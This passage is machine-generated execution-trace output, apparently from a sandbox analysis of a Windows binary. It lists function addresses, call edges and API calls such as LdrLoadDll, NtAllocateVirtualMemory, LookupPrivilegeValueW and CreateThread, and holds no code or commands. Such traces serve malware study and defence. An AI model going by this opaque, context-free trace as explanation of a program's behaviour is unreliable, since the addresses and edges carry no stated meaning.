bde15b 33556->33557 33557->33497 33558->33487 33559->33474 33561 bdca5c RtlAllocateHeap 33560->33561 33562 bdd3e0 LdrLoadDll 33560->33562 33561->33549 33562->33561 33564 bdd3e0 LdrLoadDll 33563->33564 33565 bdc7ec 33564->33565 33568 35d9560 LdrInitializeThunk 33565->33568 33566 bd6ef5 33566->33536 33568->33566 33700 bdc950 33569->33700 33571 bde2cd 33571->33415 33573 bd6551 33572->33573 33574 bd6559 33572->33574 33573->33417 33575 bd682c 33574->33575 33703 bdf3e0 33574->33703 33575->33417 33577 bd65ad 33578 bdf3e0 2 API calls 33577->33578 33581 bd65b8 33578->33581 33579 bd6606 33582 bdf3e0 2 API calls 33579->33582 33581->33579 33583 bdf510 3 API calls 33581->33583 33717 bdf480 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33581->33717 33585 bd661a 33582->33585 33583->33581 33584 bd6677 33586 bdf3e0 2 API calls 33584->33586 33585->33584 33708 bdf510 33585->33708 33587 bd668d 33586->33587 33589 bd66ca 33587->33589 33591 bdf510 3 API calls 33587->33591 33590 bdf3e0 2 API calls 33589->33590 33592 bd66d5 33590->33592 33591->33587 33593 bdf510 3 API calls 33592->33593 33600 bd670f 33592->33600 33593->33592 33596 bdf440 2 API calls 33597 bd680e 33596->33597 33598 bdf440 2 API calls 33597->33598 33599 bd6818 33598->33599 33601 bdf440 2 API calls 33599->33601 33714 bdf440 33600->33714 33602 bd6822 33601->33602 33603 bdf440 2 API calls 33602->33603 33603->33575 33605 bd78b1 33604->33605 33606 bd6f50 10 API calls 33605->33606 33611 bd78c7 33606->33611 33607 bd78d0 33607->33421 33608 bd7907 33609 bde320 2 API calls 33608->33609 33610 bd7918 33609->33610 33610->33421 33611->33607 33611->33608 33612 bd7953 33611->33612 33613 bde320 2 API calls 33612->33613 33614 bd7958 33613->33614 33614->33421 33718 bdd060 33615->33718 33617 bdd1e4 33618 bdd060 LdrLoadDll 33617->33618 33619 bdd1ed 33618->33619 33620 bdd060 LdrLoadDll 33619->33620 33621 bdd1f6 33620->33621 33622 bdd060 LdrLoadDll 33621->33622 33623 bdd1ff 33622->33623 33624 bdd060 LdrLoadDll 33623->33624 33625 bdd208 33624->33625 33626 bdd060 LdrLoadDll 33625->33626 33627 bdd211 33626->33627 33628 bdd060 LdrLoadDll 33627->33628 33629 bdd21d 33628->33629 33630 bdd060 LdrLoadDll 33629->33630 33631 bdd226 33630->33631 33632 bdd060 LdrLoadDll 33631->33632 33633 bdd22f 33632->33633 33634 bdd060 LdrLoadDll 33633->33634 33635 bdd238 33634->33635 33636 bdd060 LdrLoadDll 33635->33636 33637 bdd241 33636->33637 33638 bdd060 LdrLoadDll 33637->33638 33639 bdd24a 33638->33639 33640 bdd060 LdrLoadDll 33639->33640 33641 bdd256 33640->33641 33642 bdd060 LdrLoadDll 33641->33642 33643 bdd25f 33642->33643 33644 bdd060 LdrLoadDll 33643->33644 33645 bdd268 33644->33645 33646 bdd060 LdrLoadDll 33645->33646 33647 bdd271 33646->33647 33648 bdd060 LdrLoadDll 33647->33648 33649 bdd27a 33648->33649 33650 bdd060 LdrLoadDll 33649->33650 33651 bdd283 33650->33651 33652 bdd060 LdrLoadDll 33651->33652 33653 bdd28f 33652->33653 33654 bdd060 LdrLoadDll 33653->33654 33655 bdd298 33654->33655 33656 bdd060 LdrLoadDll 33655->33656 33657 bdd2a1 33656->33657 33658 bdd060 LdrLoadDll 33657->33658 33659 bdd2aa 33658->33659 33660 bdd060 LdrLoadDll 33659->33660 33661 bdd2b3 33660->33661 33662 bdd060 LdrLoadDll 33661->33662 33663 bdd2bc 33662->33663 33664 bdd060 LdrLoadDll 33663->33664 33665 bdd2c8 33664->33665 33666 bdd060 LdrLoadDll 33665->33666 33667 bdd2d1 33666->33667 33668 bdd060 LdrLoadDll 33667->33668 33669 bdd2da 33668->33669 33670 bdd060 LdrLoadDll 33669->33670 33671 bdd2e3 33670->33671 33672 bdd060 LdrLoadDll 33671->33672 33673 bdd2ec 33672->33673 33674 bdd060 LdrLoadDll 33673->33674 33675 bdd2f5 33674->33675 33676 bdd060 LdrLoadDll 33675->33676 33677 bdd301 33676->33677 33678 bdd060 LdrLoadDll 33677->33678 33679 bdd30a 33678->33679 33680 bdd060 LdrLoadDll 33679->33680 33681 bdd313 33680->33681 33682 bdd060 LdrLoadDll 33681->33682 33683 bdd31c 33682->33683 33684 bdd060 LdrLoadDll 33683->33684 33685 bdd325 33684->33685 33686 bdd060 LdrLoadDll 33685->33686 33687 bdd32e 33686->33687 33688 bdd060 LdrLoadDll 33687->33688 33689 bdd33a 33688->33689 33690 bdd060 LdrLoadDll 33689->33690 33691 bdd343 33690->33691 33692 bdd060 LdrLoadDll 33691->33692 33693 bdd34c 33692->33693 33693->33425 33695 bdd3e0 LdrLoadDll 33694->33695 33696 bdc2ec 33695->33696 33724 35d9860 LdrInitializeThunk 33696->33724 33697 bdc303 33697->33347 33699->33422 33701 bdd3e0 LdrLoadDll 33700->33701 33702 bdc96c NtAllocateVirtualMemory 33701->33702 33702->33571 33704 bdf3f6 33703->33704 33705 bdf3f0 33703->33705 33706 bde400 2 API calls 33704->33706 33705->33577 33707 bdf41c 33706->33707 33707->33577 33709 bdf480 33708->33709 33710 bde400 2 API calls 33709->33710 33711 bdf4dd 33709->33711 33712 bdf4ba 33710->33712 33711->33585 33713 bde320 2 API calls 33712->33713 33713->33711 33715 bd6804 33714->33715 33716 bde320 2 API calls 33714->33716 33715->33596 33716->33715 33717->33581 33719 bdd07b 33718->33719 33720 bd7360 LdrLoadDll 33719->33720 33721 bdd09b 33720->33721 33722 bd7360 LdrLoadDll 33721->33722 33723 bdd14f 33721->33723 33722->33723 33723->33617 33724->33697 33726 35d968f LdrInitializeThunk 33725->33726 33727 35d9681 33725->33727 33726->33431 33727->33431 33729 bdd3e0 LdrLoadDll 33728->33729 33730 bdca9c RtlFreeHeap 33729->33730 33730->33435 33732 bc720b 33731->33732 33733 bc7210 33731->33733 33732->33355 33734 bde2a0 2 API calls 33733->33734 33743 bc7235 33734->33743 33735 bc7298 33735->33355 33736 bdc2d0 2 API calls 33736->33743 33738 bc72c4 33738->33355 33739 bc729e 33739->33738 33740 bdc9d0 2 API calls 33739->33740 33742 bc72b5 33740->33742 33741 bde2a0 2 API calls 33741->33743 33742->33355 33743->33735 33743->33736 33743->33739 33743->33741 33747 bdc9d0 33743->33747 33745 bdc9d0 2 API calls 33744->33745 33746 bc74de 33745->33746 33746->33312 33748 bdd3e0 LdrLoadDll 33747->33748 33749 bdc9ec 33748->33749 33752 35d96e0 LdrInitializeThunk 33749->33752 33750 bdca03 33750->33743 33752->33750 33754 bddaa3 33753->33754 33757 bcabf0 33754->33757 33758 bcac14 33757->33758 33759 bc9b2b 33758->33759 33760 bcac50 LdrLoadDll 33758->33760 33759->33320 33760->33759 33762 bcaf63 33761->33762 33764 bcafe0 33762->33764 33776 bdc0a0 LdrLoadDll 33762->33776 33764->33325 33766 bdd3e0 LdrLoadDll 33765->33766 33767 bcdc4b 33766->33767 33767->33333 33768 bdcbe0 33767->33768 33769 bdd3e0 LdrLoadDll 33768->33769 33770 bdcbff LookupPrivilegeValueW 33769->33770 33770->33329 33772 bdd3e0 LdrLoadDll 33771->33772 33773 bdc68c 33772->33773 33774 bdc6ab 33773->33774 33777 35d9910 LdrInitializeThunk 33773->33777 33774->33330 33776->33764 33777->33774 33779 bcb0e7 33778->33779 33780 bcaf40 LdrLoadDll 33779->33780 33781 bcb14a 33780->33781 33781->33271 33783 bcae34 33782->33783 33830 bdc0a0 LdrLoadDll 33783->33830 33785 bcae6e 33785->33273 33787 bcde7c 33786->33787 33788 bcb0c0 LdrLoadDll 33787->33788 33789 bcde8e 33788->33789 33831 bcdd20 33789->33831 33792 bcdea9 33795 bdc8a0 2 API calls 33792->33795 33796 bcdeb4 33792->33796 33793 bcded2 33793->33277 33794 bcdec1 33794->33793 33797 bdc8a0 2 API calls 33794->33797 33795->33796 33796->33277 33797->33793 33799 bcc316 33798->33799 33800 bcc320 33798->33800 33799->33286 33801 bcaf40 LdrLoadDll 33800->33801 33802 bcc391 33801->33802 33803 bcae10 LdrLoadDll 33802->33803 33805 bcc3a5 33803->33805 33804 bcc3c8 33804->33286 33805->33804 33806 bcaf40 LdrLoadDll 33805->33806 33807 bcc3e4 33806->33807 33808 bd6f50 10 API calls 33807->33808 33809 bcc439 33808->33809 33809->33286 33850 bce110 33810->33850 33812 bc88ca 33823 bc8c21 33812->33823 33855 bd6880 33812->33855 33814 bdf3e0 2 API calls 33815 bc8ac2 33814->33815 33817 bdf510 3 API calls 33815->33817 33816 bc8926 33816->33814 33816->33823 33819 bc8ad7 33817->33819 33818 bc7200 4 API calls 33825 bc8b2a 33818->33825 33819->33825 33928 bc3660 11 API calls 33819->33928 33823->33275 33825->33818 33825->33823 33826 bc74c0 2 API calls 33825->33826 33858 bcc030 33825->33858 33908 bce0b0 33825->33908 33912 bcdb10 33825->33912 33826->33825 33827->33281 33828->33291 33829->33299 33830->33785 33832 bcdd3a 33831->33832 33840 bcddf0 33831->33840 33833 bcaf40 LdrLoadDll 33832->33833 33834 bcdd5c 33833->33834 33841 bdc350 33834->33841 33836 bcdd9e 33844 bdc390 33836->33844 33839 bdc8a0 2 API calls 33839->33840 33840->33792 33840->33794 33842 bdd3e0 LdrLoadDll 33841->33842 33843 bdc36c 33842->33843 33843->33836 33845 bdd3e0 LdrLoadDll 33844->33845 33846 bdc3ac 33845->33846 33849 35d9fe0 LdrInitializeThunk 33846->33849 33847 bcdde4 33847->33839 33849->33847 33851 bd7360 LdrLoadDll 33850->33851 33852 bce12f 33851->33852 33853 bce13d 33852->33853 33854 bce136 SetErrorMode 33852->33854 33853->33812 33854->33853 33929 bcdee0 33855->33929 33857 bd68a6 33857->33816 33859 bcc049 33858->33859 33860 bcc04f 33858->33860 33948 bcd7e0 33859->33948 33955 bc9700 33860->33955 33863 bcc05c 33864 bdf510 3 API calls 33863->33864 33907 bcc2f2 33863->33907 33865 bcc078 33864->33865 33866 bcc08c 33865->33866 33867 bce0b0 2 API calls 33865->33867 33964 bdc120 33866->33964 33867->33866 33870 bcc1c0 33980 bcbfd0 LdrLoadDll LdrInitializeThunk 33870->33980 33871 bdc310 2 API calls 33872 bcc10a 33871->33872 33872->33870 33876 bcc116 33872->33876 33874 bcc1df 33875 bcc1e7 33874->33875 33981 bcbf40 LdrLoadDll NtClose LdrInitializeThunk 33874->33981 33877 bdc8a0 2 API calls 33875->33877 33881 bdc420 2 API calls 33876->33881 33890 bcc169 33876->33890 33876->33907 33879 bcc1f1 33877->33879 33879->33825 33880 bcc209 33880->33875 33883 bcc210 33880->33883 33881->33890 33882 bdc8a0 2 API calls 33884 bcc186 33882->33884 33888 bcc228 33883->33888 33982 bcbec0 LdrLoadDll LdrInitializeThunk 33883->33982 33967 bdb6f0 33884->33967 33983 bdc1a0 LdrLoadDll 33888->33983 33889 bcc23c 33984 bcbd40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33889->33984 33890->33882 33891 bcc19d 33891->33907 33970 bc7660 33891->33970 33894 bcc260 33896 bcc2ad 33894->33896 33985 bdc1d0 LdrLoadDll 33894->33985 33987 bdc230 LdrLoadDll 33896->33987 33899 bcc2bb 33901 bdc8a0 2 API calls 33899->33901 33900 bcc27e 33900->33896 33986 bdc260 LdrLoadDll 33900->33986 33902 bcc2c5 33901->33902 33903 bdc8a0 2 API calls 33902->33903 33905 bcc2cf 33903->33905 33906 bc7660 3 API calls 33905->33906 33905->33907 33906->33907 33907->33825 33909 bce0c3 33908->33909 34015 bdc2a0 33909->34015 33913 bcdb27 33912->33913 33914 bcdb47 33912->33914 33913->33914 34021 bcd920 33913->34021 33919 bcdb89 33914->33919 34041 bcd760 33914->34041 33918 bcdbbb 33924 bcdbe1 33918->33924 34064 bdae30 12 API calls 33918->34064 33919->33918 34063 bcd000 12 API calls 33919->34063 34065 bc48e0 29 API calls 33924->34065 33925 bcdbf6 33925->33825 33927 bd6f50 10 API calls 33927->33919 33928->33825 33930 bcdefd 33929->33930 33936 bdc3d0 33930->33936 33933 bcdf45 33933->33857 33937 bdd3e0 LdrLoadDll 33936->33937 33938 bdc3ec 33937->33938 33946 35d99a0 LdrInitializeThunk 33938->33946 33939 bcdf3e 33939->33933 33941 bdc420 33939->33941 33942 bdd3e0 LdrLoadDll 33941->33942 33943 bdc43c 33942->33943 33947 35d9780 LdrInitializeThunk 33943->33947 33944 bcdf6e 33944->33857 33946->33939 33947->33944 33988 bcd080 33948->33988 33950 bde400 2 API calls 33951 bcd911 33950->33951 33951->33860 33952 bcd7fe 33954 bcd902 33952->33954 34001 bdb580 33952->34001 33954->33950 33957 bc971b 33955->33957 33956 bc983b 33956->33863 33957->33956 33958 bcdd20 3 API calls 33957->33958 33959 bc981c 33958->33959 33960 bc984a 33959->33960 33961 bc9831 33959->33961 33962 bdc8a0 2 API calls 33959->33962 33960->33863 34014 bc6340 LdrLoadDll 33961->34014 33962->33961 33965 bdd3e0 LdrLoadDll 33964->33965 33966 bcc0e0 33965->33966 33966->33870 33966->33871 33966->33907 33968 bce0b0 2 API calls 33967->33968 33969 bdb722 33968->33969 33969->33891 33971 bc7678 33970->33971 33972 bcabf0 LdrLoadDll 33971->33972 33973 bc7693 33972->33973 33974 bd7360 LdrLoadDll 33973->33974 33975 bc76a3 33974->33975 33976 bc76ac PostThreadMessageW 33975->33976 33977 bc76dd 33975->33977 33976->33977 33978 bc76c0 33976->33978 33977->33825 33979 bc76ca PostThreadMessageW 33978->33979 33979->33977 33980->33874 33981->33880 33982->33888 33983->33889 33984->33894 33985->33900 33986->33896 33987->33899 33989 bcd0b3 33988->33989 34006 bcb230 33989->34006 33991 bcd0c5 34010 bcb3a0 33991->34010 33993 bcd0e3 33994 bcb3a0 LdrLoadDll 33993->33994 33995 bcd0f9 33994->33995 33996 bcdee0 3 API calls 33995->33996 33997 bcd12f 33996->33997 33998 bcd136 33997->33998 34013 bde440 LdrLoadDll RtlAllocateHeap 33997->34013 33998->33952 34000 bcd146 34000->33952 34002 bd7360 LdrLoadDll 34001->34002 34003 bdb5a1 34002->34003 34004 bdb5c7 34003->34004 34005 bdb5b4 CreateThread 34003->34005 34004->33954 34005->33954 34007 bcb257 34006->34007 34008 bcaf40 LdrLoadDll 34007->34008 34009 bcb293 34008->34009 34009->33991 34011 bcaf40 LdrLoadDll 34010->34011 34012 bcb3b9 34011->34012 34012->33993 34013->34000 34014->33956 34016 bdd3e0 LdrLoadDll 34015->34016 34017 bdc2bc 34016->34017 34020 35d9840 LdrInitializeThunk 34017->34020 34018 bce0ee 34018->33825 34020->34018 34022 bcd950 34021->34022 34066 bd6240 34022->34066 34024 bcd9a1 34104 bd5020 34024->34104 34026 bcd9a7 34140 bd1ed0 34026->34140 34028 bcd9ad 34171 bd40b0 34028->34171 34034 bcd9c1 34216 bd58c0 34034->34216 34036 bcd9c7 34242 bcfa50 34036->34242 34038 bcd9df 34253 bd0aa0 34038->34253 34042 bcd778 34041->34042 34046 bcd7cf 34041->34046 34043 bd0cf0 10 API calls 34042->34043 34042->34046 34044 bcd7b9 34043->34044 34044->34046 34600 bd0f40 12 API calls 34044->34600 34046->33925 34047 bcd5a0 34046->34047 34048 bcd5bc 34047->34048 34062 bcd69b 34047->34062 34051 bdc8a0 2 API calls 34048->34051 34048->34062 34049 bcd731 34050 bcd74e 34049->34050 34052 bd6f50 10 API calls 34049->34052 34050->33919 34050->33927 34053 bcd5d7 34051->34053 34052->34050 34601 bcc9a0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34053->34601 34055 bcd70b 34055->34049 34603 bccb60 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34055->34603 34057 bcd60f 34059 bcaf40 LdrLoadDll 34057->34059 34060 bcd620 34059->34060 34061 bcaf40 LdrLoadDll 34060->34061 34061->34062 34062->34049 34602 bcc9a0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34062->34602 34063->33918 34064->33924 34065->33925 34067 bd6268 34066->34067 34068 bcaf40 LdrLoadDll 34067->34068 34069 bd6297 34068->34069 34258 bcc770 34069->34258 34071 bd62d1 34071->34024 34072 bd62ca 34072->34071 34073 bcaf40 LdrLoadDll 34072->34073 34074 bd62f9 34073->34074 34075 bcaf40 LdrLoadDll 34074->34075 34076 bd631d 34075->34076 34269 bcc830 34076->34269 34079 bd6383 34083 bcaf40 LdrLoadDll 34079->34083 34081 bd635a 34082 bd6506 34081->34082 34277 bd5f90 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34081->34277 34082->34024 34085 bd63a3 34083->34085 34086 bcc830 2 API calls 34085->34086 34090 bd63c7 34086->34090 34087 bd640d 34088 bcc830 2 API calls 34087->34088 34093 bd643d 34088->34093 34089 bd63e4 34089->34082 34278 bd5f90 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34089->34278 34090->34087 34090->34089 34091 bd5ba0 10 API calls 34090->34091 34091->34089 34094 bd6483 34093->34094 34095 bd645a 34093->34095 34096 bd5ba0 10 API calls 34093->34096 34098 bcc830 2 API calls 34094->34098 34095->34082 34279 bd5f90 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34095->34279 34096->34095 34099 bd64e2 34098->34099 34100 bd652b 34099->34100 34101 bd64ff 34099->34101 34102 bd5ba0 10 API calls 34099->34102 34100->34024 34101->34082 34280 bd5f90 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34101->34280 34102->34101 34105 bd5084 34104->34105 34106 bcaf40 LdrLoadDll 34105->34106 34107 bd5151 34106->34107 34108 bcc770 3 API calls 34107->34108 34110 bd5184 34108->34110 34109 bd518b 34109->34026 34110->34109 34111 bcaf40 LdrLoadDll 34110->34111 34112 bd51b3 34111->34112 34113 bcc830 2 API calls 34112->34113 34114 bd51f3 34113->34114 34115 bd5ba0 10 API calls 34114->34115 34138 bd5313 34114->34138 34116 bd5210 34115->34116 34117 bd5322 34116->34117 34296 bd4e40 34116->34296 34118 bdc8a0 2 API calls 34117->34118 34120 bd532c 34118->34120 34120->34026 34121 bd5228 34121->34117 34122 bd5233 34121->34122 34123 bde400 2 API calls 34122->34123 34124 bd525c 34123->34124 34125 bd527b 34124->34125 34126 bd5265 34124->34126 34325 bd4d30 CoInitialize 34125->34325 34127 bdc8a0 2 API calls 34126->34127 34129 bd526f 34127->34129 34129->34026 34130 bd5289 34327 bdc5b0 34130->34327 34132 bd5302 34133 bdc8a0 2 API calls 34132->34133 34134 bd530c 34133->34134 34136 bde320 2 API calls 34134->34136 34136->34138 34137 bd52a7 34137->34132 34139 bdc5b0 2 API calls 34137->34139 34332 bd4c60 LdrLoadDll RtlFreeHeap 34137->34332 34138->34026 34139->34137 34141 bd1ef8 34140->34141 34142 bde400 2 API calls 34141->34142 34144 bd1f58 34142->34144 34143 bd1f61 34143->34028 34144->34143 34334 bd1330 34144->34334 34146 bd1f8a 34147 bd1faa 34146->34147 34364 bd1640 LdrLoadDll 34146->34364 34149 bd1fc8 34147->34149 34366 bd3bb0 12 API calls 34147->34366 34156 bd1fe2 34149->34156 34368 bcad40 LdrLoadDll 34149->34368 34150 bd1f98 34150->34147 34365 bd1c50 10 API calls 34150->34365 34153 bd1fbc 34367 bd3bb0 12 API calls 34153->34367 34157 bd1330 12 API calls 34156->34157 34158 bd200f 34157->34158 34159 bd2030 34158->34159 34369 bd1640 LdrLoadDll 34158->34369 34160 bd204e 34159->34160 34371 bd3bb0 12 API calls 34159->34371 34163 bd2068 34160->34163 34373 bcad40 LdrLoadDll 34160->34373 34167 bde320 2 API calls 34163->34167 34164 bd201e 34164->34159 34370 bd1c50 10 API calls 34164->34370 34165 bd2042 34372 bd3bb0 12 API calls 34165->34372 34170 bd2072 34167->34170 34170->34028 34172 bd40d6 34171->34172 34173 bcaf40 LdrLoadDll 34172->34173 34174 bd4105 34173->34174 34175 bcaf40 LdrLoadDll 34174->34175 34176 bd4131 34174->34176 34175->34176 34393 bce300 34176->34393 34179 bd4215 34180 bcd9b5 34179->34180 34398 bce340 34179->34398 34409 bd3dc0 34179->34409 34182 bd5340 34180->34182 34183 bd40b0 12 API calls 34182->34183 34184 bcd9bb 34183->34184 34185 bd2dd0 34184->34185 34186 bd2df2 34185->34186 34187 bcaf40 LdrLoadDll 34186->34187 34188 bd2fbd 34187->34188 34189 bcaf40 LdrLoadDll 34188->34189 34190 bd2fce 34189->34190 34191 bcae10 LdrLoadDll 34190->34191 34192 bd2fe5 34191->34192 34489 bd2ca0 34192->34489 34195 bd2ca0 13 API calls 34196 bd305b 34195->34196 34197 bd2ca0 13 API calls 34196->34197 34198 bd3073 34197->34198 34199 bd2ca0 13 API calls 34198->34199 34200 bd308b 34199->34200 34201 bd2ca0 13 API calls 34200->34201 34202 bd30a3 34201->34202 34203 bd2ca0 13 API calls 34202->34203 34204 bd30be 34203->34204 34205 bd30d8 34204->34205 34206 bd2ca0 13 API calls 34204->34206 34205->34034 34207 bd310c 34206->34207 34208 bd2ca0 13 API calls 34207->34208 34209 bd3149 34208->34209 34210 bd2ca0 13 API calls 34209->34210 34211 bd3186 34210->34211 34212 bd2ca0 13 API calls 34211->34212 34213 bd31c3 34212->34213 34214 bd2ca0 13 API calls 34213->34214 34215 bd3200 34214->34215 34215->34034 34217 bd58dd 34216->34217 34218 bcabf0 LdrLoadDll 34217->34218 34219 bd58f8 34218->34219 34220 bd7360 LdrLoadDll 34219->34220 34239 bd5ac6 34219->34239 34221 bd5922 34220->34221 34222 bd7360 LdrLoadDll 34221->34222 34223 bd5935 34222->34223 34224 bd7360 LdrLoadDll 34223->34224 34225 bd5948 34224->34225 34226 bd7360 LdrLoadDll 34225->34226 34227 bd595b 34226->34227 34228 bd7360 LdrLoadDll 34227->34228 34229 bd5971 34228->34229 34230 bd7360 LdrLoadDll 34229->34230 34231 bd5984 34230->34231 34232 bd7360 LdrLoadDll 34231->34232 34233 bd5997 34232->34233 34234 bd7360 LdrLoadDll 34233->34234 34235 bd59aa 34234->34235 34236 bd7360 LdrLoadDll 34235->34236 34237 bd59bf 34236->34237 34238 bd5ba0 10 API calls 34237->34238 34237->34239 34241 bd5a41 34238->34241 34239->34036 34241->34239 34504 bd5480 LdrLoadDll 34241->34504 34243 bcfa6b 34242->34243 34244 bcfa60 34242->34244 34505 bce760 34243->34505 34245 bde400 2 API calls 34244->34245 34245->34243 34247 bcfa7a 34248 bcfa81 34247->34248 34250 bcfaa0 34247->34250 34514 bcf7f0 34247->34514 34248->34038 34251 bcfab8 34250->34251 34252 bde320 2 API calls 34250->34252 34251->34038 34252->34251 34533 bd0820 34253->34533 34255 bd0aad 34556 bd0500 34255->34556 34257 bcd9f1 34257->33914 34259 bcc79c 34258->34259 34260 bdc5f0 LdrLoadDll 34259->34260 34261 bcc7b5 34260->34261 34262 bcc7bc 34261->34262 34281 bdc630 34261->34281 34262->34072 34266 bcc7f7 34267 bdc8a0 2 API calls 34266->34267 34268 bcc81a 34267->34268 34268->34072 34270 bcc855 34269->34270 34290 bdc4a0 34270->34290 34273 bd5ba0 34274 bd5c1d 34273->34274 34275 bd6f50 10 API calls 34274->34275 34276 bd5d99 34274->34276 34275->34276 34276->34081 34277->34079 34278->34087 34279->34094 34280->34100 34282 bdd3e0 LdrLoadDll 34281->34282 34283 bdc64c 34282->34283 34289 35d9710 LdrInitializeThunk 34283->34289 34284 bcc7df 34284->34262 34286 bdcc20 34284->34286 34287 bdd3e0 LdrLoadDll 34286->34287 34288 bdcc3f 34287->34288 34288->34266 34289->34284 34291 bdd3e0 LdrLoadDll 34290->34291 34292 bdc4bc 34291->34292 34295 35d96d0 LdrInitializeThunk 34292->34295 34293 bcc8c9 34293->34079 34293->34273 34295->34293 34297 bd4e5c 34296->34297 34298 bcabf0 LdrLoadDll 34297->34298 34299 bd4e77 34298->34299 34300 bd4e80 34299->34300 34301 bd7360 LdrLoadDll 34299->34301 34300->34121 34302 bd4e97 34301->34302 34303 bd7360 LdrLoadDll 34302->34303 34304 bd4eac 34303->34304 34305 bd7360 LdrLoadDll 34304->34305 34306 bd4ebf 34305->34306 34307 bd7360 LdrLoadDll 34306->34307 34308 bd4ed2 34307->34308 34309 bd7360 LdrLoadDll 34308->34309 34310 bd4ee8 34309->34310 34311 bd7360 LdrLoadDll 34310->34311 34312 bd4efb 34311->34312 34313 bcabf0 LdrLoadDll 34312->34313 34314 bd4f24 34313->34314 34315 bd7360 LdrLoadDll 34314->34315 34323 bd4fc0 34314->34323 34316 bd4f48 34315->34316 34317 bcabf0 LdrLoadDll 34316->34317 34318 bd4f7d 34317->34318 34319 bd7360 LdrLoadDll 34318->34319 34318->34323 34320 bd4f9a 34319->34320 34321 bd7360 LdrLoadDll 34320->34321 34322 bd4fad 34321->34322 34322->34323 34324 bd7360 LdrLoadDll 34322->34324 34323->34121 34324->34323 34326 bd4d95 34325->34326 34326->34130 34328 bdd3e0 LdrLoadDll 34327->34328 34329 bdc5cc 34328->34329 34333 35d9610 LdrInitializeThunk 34329->34333 34330 bdc5eb 34330->34137 34332->34137 34333->34330 34335 bd13c8 34334->34335 34336 bcaf40 LdrLoadDll 34335->34336 34337 bd1466 34336->34337 34338 bcaf40 LdrLoadDll 34337->34338 34339 bd1481 34338->34339 34340 bcc830 2 API calls 34339->34340 34341 bd14a6 34340->34341 34342 bd15ed 34341->34342 34386 bdc530 34341->34386 34344 bd15fe 34342->34344 34374 bd0cf0 34342->34374 34344->34146 34347 bd15e3 34348 bdc8a0 2 API calls 34347->34348 34348->34342 34349 bd14df 34350 bdc8a0 2 API calls 34349->34350 34351 bd1519 34350->34351 34391 bde4d0 LdrLoadDll 34351->34391 34353 bd154f 34353->34344 34354 bcc830 2 API calls 34353->34354 34355 bd1575 34354->34355 34355->34344 34356 bdc530 2 API calls 34355->34356 34357 bd159a 34356->34357 34358 bd15cd 34357->34358 34359 bd15a1 34357->34359 34361 bdc8a0 2 API calls 34358->34361 34360 bdc8a0 2 API calls 34359->34360 34362 bd15ab 34360->34362 34363 bd15d7 34361->34363 34362->34146 34363->34146 34364->34150 34365->34147 34366->34153 34367->34149 34368->34156 34369->34164 34370->34159 34371->34165 34372->34160 34373->34163 34375 bd0d15 34374->34375 34376 bcaf40 LdrLoadDll 34375->34376 34377 bd0dd0 34376->34377 34378 bcaf40 LdrLoadDll 34377->34378 34379 bd0df4 34378->34379 34380 bd6f50 10 API calls 34379->34380 34382 bd0e47 34380->34382 34381 bd0f01 34381->34344 34382->34381 34383 bcaf40 LdrLoadDll 34382->34383 34384 bd0eae 34383->34384 34385 bd6f50 10 API calls 34384->34385 34385->34381 34387 bdd3e0 LdrLoadDll 34386->34387 34388 bdc54c 34387->34388 34392 35d9650 LdrInitializeThunk 34388->34392 34389 bd14d4 34389->34347 34389->34349 34391->34353 34392->34389 34394 bce31f 34393->34394 34395 bd7360 LdrLoadDll 34393->34395 34396 bce331 34394->34396 34397 bce326 GetFileAttributesW 34394->34397 34395->34394 34396->34179 34397->34396 34399 bce355 34398->34399 34407 bce6f2 34398->34407 34400 bd6f50 10 API calls 34399->34400 34399->34407 34401 bce67d 34400->34401 34402 bd6f50 10 API calls 34401->34402 34401->34407 34403 bce6b1 34402->34403 34404 bce6c3 34403->34404 34405 bce702 34403->34405 34403->34407 34406 bd6f50 10 API calls 34404->34406 34405->34407 34408 bd6f50 10 API calls 34405->34408 34406->34407 34407->34179 34408->34407 34412 bd3dd6 34409->34412 34433 bdabb0 34409->34433 34411 bd3e2b 34411->34179 34412->34411 34413 bd3df5 34412->34413 34414 bd3e37 34412->34414 34415 bd3dfd 34413->34415 34416 bd3e1a 34413->34416 34417 bcaf40 LdrLoadDll 34414->34417 34418 bde320 2 API calls 34415->34418 34419 bde320 2 API calls 34416->34419 34420 bd3e48 34417->34420 34421 bd3e0e 34418->34421 34419->34411 34422 bd6f50 10 API calls 34420->34422 34421->34179 34423 bd3e5f 34422->34423 34473 bd3210 34423->34473 34425 bd3e6a 34429 bd3f68 34425->34429 34430 bd3e82 34425->34430 34426 bd3f4f 34427 bde320 2 API calls 34426->34427 34428 bd4073 34427->34428 34428->34179 34429->34426 34484 bd37a0 11 API calls 34429->34484 34430->34426 34483 bd37a0 11 API calls 34430->34483 34434 bdabbe 34433->34434 34435 bdabc5 34433->34435 34434->34412 34436 bcabf0 LdrLoadDll 34435->34436 34437 bdabf7 34436->34437 34438 bdac06 34437->34438 34485 bda6a0 LdrLoadDll 34437->34485 34439 bde400 2 API calls 34438->34439 34467 bdadbf 34438->34467 34441 bdac1f 34439->34441 34442 bdad6e 34441->34442 34443 bdac34 34441->34443 34441->34467 34444 bdad78 34442->34444 34445 bdae11 34442->34445 34486 bd32f0 LdrLoadDll 34443->34486 34487 bd32f0 LdrLoadDll 34444->34487 34448 bde320 2 API calls 34445->34448 34448->34467 34449 bdac4b 34451 bd7360 LdrLoadDll 34449->34451 34450 bdad8f 34488 bda030 LdrLoadDll 34450->34488 34453 bdac61 34451->34453 34455 bd7360 LdrLoadDll 34453->34455 34454 bdada5 34458 bd7360 LdrLoadDll 34454->34458 34456 bdac77 34455->34456 34457 bd7360 LdrLoadDll 34456->34457 34459 bdac8d 34457->34459 34458->34467 34460 bd7360 LdrLoadDll 34459->34460 34461 bdaca6 34460->34461 34462 bd7360 LdrLoadDll 34461->34462 34463 bdacbc 34462->34463 34464 bd7360 LdrLoadDll 34463->34464 34465 bdacd2 34464->34465 34466 bd7360 LdrLoadDll 34465->34466 34468 bdace8 34466->34468 34467->34412 34469 bd7360 LdrLoadDll 34468->34469 34470 bdad0e 34469->34470 